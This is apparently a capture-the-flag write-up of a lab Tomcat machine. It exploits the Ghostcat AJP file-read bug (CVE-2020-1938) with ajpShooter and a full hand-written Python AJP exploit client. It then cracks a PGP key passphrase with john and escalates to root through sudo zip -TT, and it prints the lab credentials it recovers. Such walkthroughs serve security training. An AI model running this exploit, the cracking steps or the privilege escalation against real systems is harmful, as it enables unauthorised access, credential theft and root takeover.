(screenshot: port scan)
The scan turned up Tomcat, and the name suggests as much. A quick search on Baidu points straight to the vulnerability: Ghostcat, the Tomcat AJP connector file read / inclusion bug. PoC address:

CVE-2020-1938

p4 here is a proxychains4 alias (the preloading lines that follow show the request going through the chain to 10.10.90.130:8009). ajpShooter is pointed at the web port for the Host header and at AJP port 8009, and asked to read /WEB-INF/web.xml:
p4 python3 ajpShooter.py http://10.10.90.130:8080 8009 /WEB-INF/web.xml read
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

(AjpShooter ASCII-art banner: 00theway, just for test)

[proxychains] Strict chain ... 120.46.78.45:7777 ... 10.10.90.130:8009 ... OK

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">

<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>

</web-app>

The <description> element of web.xml leaks a credential:
skyfuck:8730281lkjlkjdqlksalks
Then SSH in with it.
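To show what ajpShooter is actually doing on the wire, here is an added example (my own code, not from the writeup or from ajpShooter) that builds the AJP13 Forward Request behind the Ghostcat read by hand and decodes the container's reply. Tomcat trusts the javax.servlet.include.* request attributes it receives over AJP as if a front-end proxy had set them, so pointing path_info at /WEB-INF/web.xml makes the DefaultServlet serve that file. The host, port and sample response bytes are assumptions and a constructed sample, not a capture from the target.

```python
# Added example: minimal AJP13 client reproducing the Ghostcat (CVE-2020-1938)
# file read. Not code from the writeup or from ajpShooter. Host/port values are
# assumptions; SAMPLE_RESPONSE is constructed, not captured from a real server.
import socket
import struct

AJP_REQ_MAGIC = b"\x12\x34"          # proxy -> container packets
AJP_RESP_MAGIC = b"AB"               # container -> proxy packets
JK_FORWARD_REQUEST, METHOD_GET = 0x02, 2
ATTR_REQ_ATTRIBUTE, ATTR_END = 0x0A, 0xFF
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 3, 4, 5
# Response headers the container may send as a 0xA0xx code instead of a string
RESP_HEADER_CODES = {0x01: "Content-Type", 0x03: "Content-Length",
                     0x04: "Date", 0x05: "Last-Modified", 0x06: "Location"}


def ajp_string(s):
    """AJP string: 2-byte big-endian length, bytes, NUL; None encodes as 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    raw = s.encode()
    return struct.pack(">H", len(raw)) + raw + b"\x00"


def build_ghostcat_request(path, server_name="localhost", server_port=8080):
    """Forward Request packet whose include attributes point at `path`."""
    body = bytes([JK_FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1") + ajp_string("/")       # protocol, req_uri
    body += ajp_string("127.0.0.1") + ajp_string(None)     # remote_addr, remote_host
    body += ajp_string(server_name) + struct.pack(">H", server_port)
    body += b"\x00" + struct.pack(">H", 0)                 # is_ssl, num_headers
    # The three attributes that make DefaultServlet include servlet_path+path_info
    for name, value in (("javax.servlet.include.request_uri", "/"),
                        ("javax.servlet.include.path_info", path),
                        ("javax.servlet.include.servlet_path", "/")):
        body += bytes([ATTR_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([ATTR_END])
    return AJP_REQ_MAGIC + struct.pack(">H", len(body)) + body


def _read_string(buf, off):
    n = struct.unpack_from(">H", buf, off)[0]
    off += 2
    if n == 0xFFFF:
        return None, off
    return buf[off:off + n].decode(errors="replace"), off + n + 1   # skip NUL


def parse_ajp_response(data):
    """Decode container packets; returns (status, headers, body, finished)."""
    status, headers, body, finished, off = None, {}, b"", False, 0
    while off + 4 <= len(data):
        if data[off:off + 2] != AJP_RESP_MAGIC:
            raise ValueError("not an AJP response packet at offset %d" % off)
        length = struct.unpack_from(">H", data, off + 2)[0]
        payload = data[off + 4:off + 4 + length]
        if len(payload) < max(length, 1):
            break                                    # packet not fully received yet
        off += 4 + length
        if payload[0] == SEND_HEADERS:
            status = struct.unpack_from(">H", payload, 1)[0]
            _, p = _read_string(payload, 3)          # status message, e.g. "OK"
            count = struct.unpack_from(">H", payload, p)[0]
            p += 2
            for _ in range(count):
                if payload[p] == 0xA0:
                    name, p = RESP_HEADER_CODES.get(payload[p + 1], "X-Unknown"), p + 2
                else:
                    name, p = _read_string(payload, p)
                value, p = _read_string(payload, p)
                headers[name] = value
        elif payload[0] == SEND_BODY_CHUNK:
            n = struct.unpack_from(">H", payload, 1)[0]
            body += payload[3:3 + n]
        elif payload[0] == END_RESPONSE:
            finished = True
            break
    return status, headers, body, finished


def ghostcat_read(host, ajp_port, path, timeout=5.0):
    """Send the crafted request to the AJP port and return (status, headers, body)."""
    buf = b""
    with socket.create_connection((host, ajp_port), timeout=timeout) as sock:
        sock.sendall(build_ghostcat_request(path, server_name=host))
        while True:   # Tomcat keeps the connection open, so stop at END_RESPONSE
            status, headers, body, finished = parse_ajp_response(buf)
            if finished:
                return status, headers, body
            chunk = sock.recv(65536)
            if not chunk:
                return status, headers, body
            buf += chunk


def _packet(payload):
    return AJP_RESP_MAGIC + struct.pack(">H", len(payload)) + payload

# Constructed sample reply: 200 with Content-Type as code 0xA001, one body chunk, end.
SAMPLE_BODY = b"<description>\nskyfuck:8730281lkjlkjdqlksalks\n</description>"
SAMPLE_RESPONSE = (
    _packet(bytes([SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK")
            + struct.pack(">H", 1) + b"\xa0\x01" + ajp_string("application/xml"))
    + _packet(bytes([SEND_BODY_CHUNK]) + struct.pack(">H", len(SAMPLE_BODY)) + SAMPLE_BODY)
    + _packet(bytes([END_RESPONSE, 1]))
)
```

Against a live target the call is `ghostcat_read("10.10.90.130", 8009, "/WEB-INF/web.xml")`; the decoder stops at END_RESPONSE rather than waiting for the socket to close, because Tomcat holds the AJP connection open for reuse. The same request with a .jsp path in the include attributes is what turns a file read into code execution when an upload is possible, which is why the fix is to bind or disable the AJP connector and require a secret.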
(screenshot: home directory listing)

The home directory holds a key file and an encrypted file (tryhackme.asc and credential.pgp); pull them down with wget.

gpg2john tryhackme.asc > hash.txt   # extract the passphrase hash from the PGP secret key
(screenshot: gpg2john output)

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Cracked in a second.
(screenshot: john output)

Then, on the victim machine:
gpg --import tryhackme.asc   # import the key; it is the secret key, which is why gpg2john had a passphrase hash to crack
(screenshot: gpg --import output)

gpg -d credential.pgp   # decrypt credential.pgp with the imported key
(screenshot: gpg -d output)
Enter the cracked passphrase and the plaintext comes out:
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
SSH in as merlin.

Quick enumeration: sudo -l shows zip can be run as root. A quick search turns up the well-known zip trick: -T tests the archive after creation and -TT replaces the test command with one of your choosing, so that command runs with zip's (root) privileges. Root shell, done.

TF=$(mktemp -u)                          # unused temp file name for the throwaway archive
sudo zip $TF /etc/hosts -T -TT 'sh #'    # -TT runs 'sh' as the "test" command; '#' comments out the archive name zip appends
sudo rm $TF                              # clean up the archive afterwards